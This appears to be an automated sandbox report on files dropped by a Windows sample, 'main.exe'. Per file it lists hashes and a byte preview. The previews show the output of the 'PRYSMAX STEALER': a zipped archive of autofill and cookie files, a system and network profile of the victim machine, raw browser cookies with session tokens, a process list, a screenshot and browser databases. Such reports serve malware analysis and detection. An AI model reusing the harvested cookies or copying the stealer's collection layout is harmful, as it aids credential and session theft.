                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#t.wM'.wM'.wM'...'.wM'..L&.wM'..H&.wM'..I&.wM'..N&.wM'..I&.wM'..L&.wM'!.L&.wM'..K&.wM'..L&.wM'.wL'.wM'!.D&.wM'!.M&.wM'!.O&.wM'Rich.wM'........PE..d...}..g.........." .....2................................................................`.............................................L...<...........L....0..${..............h!......T...............................8............P..(............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........P...`...(..............@....pdata..${...0...|..................@..@.rsrc...L...........................@..@.reloc..h!......."..................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):650752
                                                                                                                                                                                                                                                      Entropy (8bit):6.4073215909095005
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:rbTutDqcmbgSZZ/jZMaBHXD/OHHSAU1gIkpWCuMshv9K1HFV1jBjgG4LFxJY/1n:rfrcmsSHBHXiSArRENMivwF1jdgs/1n
                                                                                                                                                                                                                                                      MD5:A19B5E6324D1A6A9FD99C98FE7B83FE2
                                                                                                                                                                                                                                                      SHA1:4E3E56754A3C46C661EF591A4B5A5985BD4F6B85
                                                                                                                                                                                                                                                      SHA-256:3ED00BB5876EAFA617BEBB213D2BC887B5637C53C4A849FCC2366084BF056787
                                                                                                                                                                                                                                                      SHA-512:5975F90036CB7D3013FC6815F2C372EB9B89AF6C8153D1770EBBD70BF5B61E3B12DEFA3D7A4CCD364BD6A978B2879A15801D2AEC8BAD9221CA15DFFC9B7BA929
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................1....!X............!X.....!X.....!X......Z............_......_......_]....._.....Rich...........................PE..d...B'.f.........." ...(.....\...... ........................................0............`.........................................0...\........................3........... .......d..............................Pc..@...............@............................text...H........................... ..`.rdata..b...........................@..@.data...............................@....pdata...3.......4..................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):519680
                                                                                                                                                                                                                                                      Entropy (8bit):6.407145343537454
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:n5vDYEvt0Fwyow0k1rErp645rtxvi1gRNg5sXgz0:npBvt0Fw9fk1rErQ45rt5RNZ
                                                                                                                                                                                                                                                      MD5:56DB4A861AEC914A860461DEDCDCA0A0
                                                                                                                                                                                                                                                      SHA1:8535A8C9EAC371A54308795A8BBE89414933E035
                                                                                                                                                                                                                                                      SHA-256:6AB611C4A24406D9D97F09D49D50142AB2734B69A2B0D9EA6489E4AF90C4A2A4
                                                                                                                                                                                                                                                      SHA-512:600A21666E9ED334DE5B4B17F60136434EE485C80F9740E6085E24EF95CA5376E6223A54C6B1C8F12987EDAB5D89AF9676CC12E2A335F4C4E9AB79DFEF8E4B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................P.............P......P......P......R........4...W......W......Wn.....W.....Rich...........PE..d...<'.f.........." ...(............ ........................................0............`.............................................d...D....................)........... ..d...0\...............................Z..@...............(............................text...H........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata...).......*..................@..@.rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                                                                      Entropy (8bit):4.713840781302666
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
                                                                                                                                                                                                                                                      MD5:8C7CA775CF482C6027B4A2D3DB0F6A31
                                                                                                                                                                                                                                                      SHA1:E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
                                                                                                                                                                                                                                                      SHA-256:52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
                                                                                                                                                                                                                                                      SHA-512:19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10
                                                                                                                                                                                                                                                      Entropy (8bit):2.7219280948873625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qW6:qW6
                                                                                                                                                                                                                                                      MD5:2C7344F3031A5107275CE84AED227411
                                                                                                                                                                                                                                                      SHA1:68ACAD72A154CBE8B2D597655FF84FD31D57C43B
                                                                                                                                                                                                                                                      SHA-256:83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
                                                                                                                                                                                                                                                      SHA-512:F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..K....}..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):367483
                                                                                                                                                                                                                                                      Entropy (8bit):7.997222431565052
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:gGirvfhLVLZgToLDeGx1bgjWuUjqT+ALcyNgIwY70hPfoFopf+GucKyiH4mpaUss:gdrvrKTf+06jqSALcWgIf7CPfB2SKn1l
                                                                                                                                                                                                                                                      MD5:CE1B6068403FEEDD7A902B74580F2C86
                                                                                                                                                                                                                                                      SHA1:07495C9FF07CFCF5C3C39C62597AD09622C49D09
                                                                                                                                                                                                                                                      SHA-256:34FFB73F33950BEA341229C27A69A7363AF067E59BD4E7F8A718CABBE5B869D0
                                                                                                                                                                                                                                                      SHA-512:BFE0C5E53CF912A6C28AC4802020C209CA9AC8FE346205B159DB1065527999D736A6B05D539B8829CE26B8C6C6ACB2CA050949432FB3B0576DBFF599EF4EB07A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PK........k}.Y................files/PK........k}.Y..8oj...........information.txtuR.R.0..3....m.....*-..."....3B....p.F.....S..>...-#.,.{.=..L.....C..#.......].5......_...6.e.>A........_C#t..L[#eC#.-..d.E.r...!D"...9.....r...r....s..L...I.'!..t...N.8@.C......6,l.o..<.@;.....i......d..D.[.5Bu.R.P...a...'.).N.d.6....FLC...f.....:.t.e.5.{......e..2.5.._...V.....>5.j....%.4Ji.X....<\.5./.........[.t.av..>...1=~.&..$#....3I%.QJJ..PK........i}.Y................prautofill.txt..PK........i}.Y@......V.......prcookies.txt...J.....^.6..0dB.8.fc..mco....y4.V...].}..U...Y ...3.....vn.s...Z..NY./T....y.r...b...HQ.9._..~.cK..G...D.....+..._.1.....G....D@...OI.bn..N........a.*...A=....'.6;.(p.$\C...0..M.o..K..k.......8:.pn.....u.]|.gjS|.2\...*..fh...&....R..7.:^........#.|..............M..7...].6........J.n..b.w..Z\...5..mS..DRy.6...)..Y5...6.....5*....H...A/.v.e/E..F^S?........y.X*t.....t..+....C..r...YTet....sia-..S8...+V"...e.n.i....i....w....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):671
                                                                                                                                                                                                                                                      Entropy (8bit):4.574892544469578
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:SAMbe7bzLxAcRQN3ASVc6hWcA7p4d4QpfWN2ZtTwmLRE4g4/g5SBAoXSgB9:SAMa7bp+NDWppLNyAUg5SBAov9
                                                                                                                                                                                                                                                      MD5:B4EC6B0D4807AA9D5855B08C080689C1
                                                                                                                                                                                                                                                      SHA1:D06863723F8494041514922AC8AFAD424720B230
                                                                                                                                                                                                                                                      SHA-256:BDB6D3A3408B16B52232633B595A3CF65C9FE4E2701B9C8C46507DFA28042754
                                                                                                                                                                                                                                                      SHA-512:A40E016D64870B762E13F1AF2CA658EF12A03500C271574A655D0A221167A655F1C24D557BE4508079C1EA155216120FDF0A85278BA9077C3B123B05F1F42C8D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.. .. .PRYSMAX STEALER!.. .. . Network Info.. .. . IP: 8.46.123.189.. . Country: United States.. . Region: New York.. . City: New York.. . Vpn: False.. . ISP: Level 3.. ... .. . Machine Info .. .. . Pc Name: 910646.. . OS: Windows-10-10.0.19045-SP0.. . CPU: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel.. . HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0.. . RAM: 7.999267578125.. . GPU: .. . Windows Key: .. . Antiviruses: Windows Defender.. List of process: 198....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3158
                                                                                                                                                                                                                                                      Entropy (8bit):5.8972122901567925
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/JMpO2gpcRqpZX22HTSjv3pB7H7e8zLs/Zw49ckse:BkXRQSfIh
                                                                                                                                                                                                                                                      MD5:8C6FF34551E5D45A9E60A03D31487053
                                                                                                                                                                                                                                                      SHA1:23C65812BDDBE33010D34CA421BD4D187DF95F74
                                                                                                                                                                                                                                                      SHA-256:5D23122C1B86CC45E5EADDED5DED8AFE6751BFC2A9AD645CE59D08AEABED5BD4
                                                                                                                                                                                                                                                      SHA-512:B568472F1AA723F2CE29A5C5BBA33A62599237B5D5DC8ACB19D2749B9E9D662A07BA0E8DDB8408EABB4A012E498C947EF16990218E8A1F6BE2777E66FC11C0F9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.google.com.TRUE./.FALSE.2597573456.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.FALSE.2597573456.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.2597573456.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310&V=4&LU=1696413236917...microsoft.com
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):809
                                                                                                                                                                                                                                                      Entropy (8bit):5.165968547442475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:2rTHwoh9wIwpjRmZDKJCwpjRSpDKJCrTV8woPpSwpjRVpbCwpjOSbpbb:SDTwIYVcDKJCYVuDKJCrSPpSYVVpbCYb
                                                                                                                                                                                                                                                      MD5:6A260B07BAB16CDD661E99BA9E0518F6
                                                                                                                                                                                                                                                      SHA1:13AB556855EADC64A8FC060B09C192AE2EFA2C23
                                                                                                                                                                                                                                                      SHA-256:8014E4C7A0E9C2751F23C198AAFC5350334E087F4F56489BCEBD63EF540AB0CF
                                                                                                                                                                                                                                                      SHA-512:FC5D394BC100D7EB1EF657BFB82F6A67A8A21EB42C2B6B50D4733AFB96DD35C46DE98A7B5055F5D1420EDE794A8190A3A63BDF3D023CBF935E8C68A68BD508EF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:https://go.microsoft.com/fwlink/?linkid=851546..https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://go.microsoft.com/fwlink/?LinkId=2106243..https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15602
                                                                                                                                                                                                                                                      Entropy (8bit):3.6207520635254564
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:VxDocWuJR1tOWSIvIAZ5maT3v8+moUnVjFizY/qXEbDiVcpEedeVRVvxNA218uoB:PDocWuJR1tOWSIvIAZ5maT3v8+moUnVt
                                                                                                                                                                                                                                                      MD5:8D01D3DB7D8C45CEA3DEA8B9772E29E6
                                                                                                                                                                                                                                                      SHA1:7FB905D88E1BD9991249C5079CDCCDD8BC1115C3
                                                                                                                                                                                                                                                      SHA-256:7115058BB4360DE2252C6A5BAC6826336F6B06A5F7DA677FB89B49B0007DFA15
                                                                                                                                                                                                                                                      SHA-512:9F201C1931DC7FDC8983A9517E84EB839FE0FFA44A0BDE4C54B2211B631E2204271C270B7F79FD4526291C8F19008706A6D64F9033EFFA81569E5E4213D98304
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Image Name PID Session Name Session# Mem Usage..========================= ======== ================ =========== ============..System Idle Process 0 Services 0 8 K..System 4 Services 0 176 K..Registry 92 Services 0 79'772 K..smss.exe 324 Services 0 1'236 K..csrss.exe 408 Services 0 5'296 K..wininit.exe 484 Services 0 7'256 K..csrss.exe 492 Console 1 6'000 K..winlogon.exe 552 Console 1 16'700 K..services.exe 620 Services 0 12'204 K..lsass.exe 628 Services 0 19'896 K..svchost.exe 752 Services
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):366822
                                                                                                                                                                                                                                                      Entropy (8bit):7.993973998461177
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:yfGElylxL6m/TieQjSdWeEAOzMgC0hPzoFopf+euMKSiF4mp0tg+V:yOxnTiedY5DrCCPzB2+KD4
                                                                                                                                                                                                                                                      MD5:F832CAC754BFF938D4E07E16E5A15514
                                                                                                                                                                                                                                                      SHA1:A31E69CA6EA1CB5145BE0FB68737F0042BDCBDB0
                                                                                                                                                                                                                                                      SHA-256:DB7898515273AB79D304834512C52EA6E1FB9E6237033813475BF3CD2273339A
                                                                                                                                                                                                                                                      SHA-512:620F73D82B8180BF009E49DA9C0432C7A8962B381A245CE712E4779A8F192D791D196EA70D6BE6A93FCA4BB15F9C5EC74F6A2226C49426BF2CDF5ECA2F445795
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.............1.c.....IDATx...{..Gq'.W..9..H.dK&&.%.m0..@B...\.`;.,..d7.$.I~.@..g_........;..br!!...Kls...1a.`.^..lI.dK.n..9g.....k..=s.s....>e}..3.....z..]..L.r..N>."..&.......W....K.].....X%..K5..H.e`I..+2.&%....y.....<)?.)......i4..G...{'......+.0G.)...;YU.N.I..~..}....3.a..d.d.?...v....'~.[.9T...k...t....G.~N:4V.kv.{..A.....3]/.....W.^R&..._.i. ^....Z.P.ef.=..(H..@&.V.D"...^x.U&...26..D...3y.{.$....33S.|.@.. .h8.2.6...E...).bffFD...;..<........,..^.'"EQ8Wq....efb..K...(..}.e&:lK{..N.."....tt.H.JA.t...Z^.P..X.*v"R...l..v.n.A...<...t.%..R..Ea../...2.\Y.y..$....2....4.g....U.p^u.9...p.b...V.+...](^.j..yND..P.0..09Q.......y./,,4.5.K?.....V.Ps....WY.eY*.8IU.U.:.L....(.T..vU......R.#.2{|E...8.B..&.B.s....\{......@k........t.LiJk.:_.S..t.....Z....$.j....!...aQeC....u{.~.n......f..#. 24.=-".$...*......9..,..n..g-..lQ.....G..*A(..Z9..U....jI{)Z+i.. ......!3...V.0.I ........E....B.V..!.Y..%...f...J.-j5.A.cR....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                      Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                      Encrypted:false
